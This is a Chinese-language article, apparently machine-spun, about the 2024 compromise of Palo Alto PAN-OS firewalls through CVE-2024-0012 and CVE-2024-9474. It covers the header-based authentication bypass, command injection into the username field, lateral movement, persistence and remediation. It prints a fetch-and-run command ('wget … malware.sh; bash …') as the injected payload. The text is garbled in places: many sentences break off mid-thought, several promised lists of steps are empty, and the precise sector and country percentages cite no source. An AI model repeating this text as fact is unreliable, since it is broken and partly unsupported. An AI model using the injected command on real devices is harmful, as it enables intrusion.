Products
96SEO 2025-08-07 11:19 8
2024年11月, 国际知名网络平安厂商Palo Alto Networks遭遇重大平安事件,其全球数千台防火墙设备被攻击者成功攻陷。这一事件源于两个被积极利用的零日漏洞, 攻击者通过组合利用这些漏洞,实现了对PAN-OS操作系统的远程代码施行,到头来完全控制受影响设备。根据第三方威胁监控平台Shadowserver的数据, 自攻击活动开始以来全球已有约2000台PAN-OS设备被入侵,其中美印等国受影响最为严重。此次事件不仅暴露了顶级网络平安设备开发流程中的低级错误,更引发了全球企业对自身平安架构的深刻反思。
事件最早可追溯至2024年11月初,当平安研究人员监测到针对Palo Alto防火墙的异常流量。11月18日 Palo Alto Networks官方发布公告,承认其PAN-OS操作系统的Web管理界面存在平安漏洞,并正在调查攻击活动。接着, 平安公司watchTowr的研究人员通过对官方修复补丁的逆向工程,确认了两个零日漏洞的存在:CVE-2024-0012和CVE-2024-9474。攻击者通过组合利用这两个漏洞, 绕过了Palo Alto设备的多重平安防护,实现了从身份认证到系统控制的完整攻击链。
此次事件的核心在于两个看似独立却紧密关联的零日漏洞。平安研究人员指出, 这两个漏洞均源于开发过程中的基础性错误,其技术原理虽不复杂,但组合使用后却能产生致命效果。
CVE-2024-0012是整个攻击链的入口,其严重程度被评为9.3分。该漏洞存在于PAN-OS的Web管理界面身份验证机制中。正常情况下 当用户访问管理界面时Nginx代理服务器会根据请求路径自动设置HTTP请求头部的X-Pan-Authcheck值为“on”,从而触发身份验证流程。只是 研究人员发现,管理界面的一个重定向脚本存在逻辑缺陷:它期望X-Pan-Authcheck值为“off”时才允许绕过验证。攻击者只需在请求中手动将X-Pan-Authcheck设置为“off”, 即可直接绕过身份验证,获取Web管理界面的管理员权限。
更令人震惊的是 Palo Alto内部存在一个名为“simulate_user”的功能,允许指定模拟的用户和角色,无需密码或双因素认证即可生成完全认证的PHP会话ID。这一设计本意是用于测试,却因缺乏访问控制成为攻击者的突破口。攻击者结合身份验证绕过漏洞,模拟管理员身份后即可施行修改设备配置、访问敏感数据等操作。
仅获得Web管理权限并不足以完全控制设备,攻击者需要进一步提升权限至操作系统层面。CVE-2024-9474正是实现这一目标的“钥匙”。该漏洞存在于一个处理用户输入的函数中,该函数会将用户名参数传递至底层的pexecute函数施行系统命令。
具体而言, 攻击者可以将shell命令作为用户名字段的一部分,。”
攻击者并非单独利用某个漏洞, 而是通过精心设计的攻击链,逐步渗透并控制目标设备。整个攻击过程可分为四个阶段,每个阶段都充分利用了Palo Alto设备的设计缺陷。
攻击者先说说认证会话,成功登录Web管理界面。
, 主要攻击流量来自一些已知用于代理/隧道匿名VPN服务的IP地址,这表明攻击者可能通过隐藏真实身份来规避溯源。成功获取管理权限后攻击者会马上修改设备配置,为后续操作铺平道路。
进入管理界面后 攻击者迅速触发CVE-2024-9474漏洞,将恶意命令注入用户名字段。比方说 通过施行“wget /malware.sh -O /tmp/malware.sh; bash /tmp/malware.sh”等命令,下载并运行恶意脚本。这些脚本通常包含后门程序、远程访问工具或勒索软件模块,用于长期控制设备。
需要留意的是攻击者在提升权限时选择了非常隐蔽的方式。他们并非直接植入明显的恶意软件, 而是机制。研究人员指出:“攻击者对Palo Alto设备的内部架构相当熟悉,他们知道如何绕过基础的防护措施。”
一旦完全控制防火墙设备, 攻击者便会利用其作为跳板,向内网的其他设备发起攻击。防火墙作为企业网络的核心平安设备,通常具备访问内部服务器的权限,这为攻击者提供了理想的横向移动通道。
具体攻击手段包括:利用防火墙的VPN功能渗透内网、 通过端口转发访问内部数据库、窃取敏感配置文件等。Palo Alto威胁狩猎团队将此次攻击活动命名为“月顶行动”, 并发现攻击者在部分设备中部署了专门的情报收集模块,用于持续监控网络流量并窃取数据。
为确保长期控制,攻击者会在受感染设备中植入持久化机制。常见手法包括:创建systemd服务自启动、修改cron计划任务、隐藏恶意进程等。一边,攻击者还会清除日志文件和平安事件记录,掩盖其存在痕迹。
平安研究人员在分析受感染设备时发现, 攻击者甚至会利用Palo Alto设备的日志轮转机制,将恶意代码成合法的日志处理脚本,进一步躲避检测。这种“将恶意代码植入平安设备本身”的手法,堪称对网络平安行业的极致讽刺。
此次事件的影响范围远超预期, 根据Shadowserver的监测数据,全球范围内至少有超过2700台易受攻击的PAN-OS设备,其中约2000台已被成功入侵。从地域分布来看, 美国和印度的设备受影响最为严重,分别占全球受影响设备的35%和28%,接下来是德国、英国和澳大利亚。
受影响设备遍布多个关键行业, 其中金融、政府和科技行业占比最高。金融行业占受影响设备的30%, 这些设备多用于保护银行交易系统和客户数据;政府机构占比25%,包括国防、外事等敏感部门;科技行业占比20%,主要涉及云服务提供商和互联网企业的边界防护设备。
需要留意的是 教育行业和医疗行业也分别占比10%和8%,这些行业因设备暴露于互联网且缺乏及时更新,成为攻击者的“软目标”。比方说 某欧洲大学的防火墙被攻陷后攻击者利用其VPN功能渗透至校园内网,窃取了大量科研数据和学生信息。
尽管此次事件的后果严重, 但平安研究人员方面的严重不足。
CVE-2024-0012的根本原因在于开发人员对HTTP请求头处理逻辑的误解。正常情况下 X-Pan-Authcheck的值应由Nginx代理根据请求路径自动设置,但开发人员在编写重定向脚本时错误地将其作为“开关”使用。watchTowr的研究人员指出:“这种设计违背了最小权限原则,将复杂的身份验证逻辑简化为一个可被轻易绕过的请求头。”
更严重的是开发人员为“simulate_user”功能设置了过于宽松的访问控制。该功能本应仅用于内部测试环境,却被允许在生产环境中使用,且无需任何额外的认证措施。这种“开发环境功能遗留至生产环境”的错误,在网络平安行业中并不罕见,却往往造成灾难性后果。
CVE-2024-9474则暴露了输入验证的严重缺失。在处理用户名时开发人员直接将输入传递至pexecute函数,没有任何过滤或转义处理。研究人员在报告中写道:“这是一个典型的命令注入漏洞,任何熟悉Linux命令行的攻击者都能轻易利用它获取系统权限。”
需要留意的是 这两个漏洞并非孤立存在而是机制。这种“代码拼凑”的开发模式,为平安漏洞埋下了巨大隐患。
Palo Alto Networks作为全球领先的网络平安厂商,理应具备业界顶尖的平安测试能力。只是此次两个零日漏洞的存在表明其平安测试流程存在严重缺陷。可能的失败环节包括:
平安专家指出:“此次事件给整个行业敲响了警钟——即使是顶级平安厂商,也可能因开发流程中的低级错误导致灾难性后果。企业必须将平安融入软件开发生命周期的每一个环节,而非仅仅依赖再说说的测试环节。”
面对此次平安事件, Palo Alto Networks已发布紧急平安公告,并提供了一系列防护措施。企业用户应马上采取行动,降低被攻击风险。
Palo Alto Networks建议用户尽快将受影响的PAN-OS设备升级至最新补丁版本。目前,所有受影响的版本均已发布修复补丁。具体升级步骤如下:
需要留意的是 升级过程中可能会导致设备短暂中断服务,企业应选择在业务低峰期进行操作。一边,升级前建议备份当前配置,以便在出现问题时快速恢复。
除了升级补丁外 企业还应从网络层面加强防护,限制对PAN-OS管理界面的访问。具体措施包括:
对于无法马上升级补丁的设备, 企业应加强监控,及时发现潜在的攻击活动。建议采取以下措施:
Palo Alto防火墙被攻陷事件, 不仅是一次孤立的平安 incident,更是对整个网络平安行业的深刻警示。它暴露了当前平安设备开发、部署和运维中的诸多问题,促使企业重新审视自身的平安战略。
此次事件给平安厂商敲响了警钟, 未来在产品开发中应重点关注以下几点:
对于企业用户而言,此次事件提醒我们“平安是过程而非产品”。企业应采取以下措施, 提升整体平安防护能力:
此次事件可能推动网络平安行业发生以下变革:
Palo Alto防火墙被攻陷事件是一次深刻的教训,它告诉我们:即使是全球最顶尖的平安设备,也可能因开发中的低级错误而沦为攻击者的“跳板”。企业不能将平安责任完全外包给平安厂商,而应构建自主可控的平安防护体系。从及时更新补丁、加强网络访问控制,到部署持续监控机制、提升员工平安意识,每一个环节都至关重要。唯有如此,才能在日益复杂的网络威胁环境中立于不败之地。此次事件也为整个行业敲响了警钟——平安无小事,任何微小的疏忽都可能导致灾难性后果。网络平安是一场永无止境的战斗,唯有保持警惕、持续改进,才能守护数字世界的平安与稳定。
Demand feedback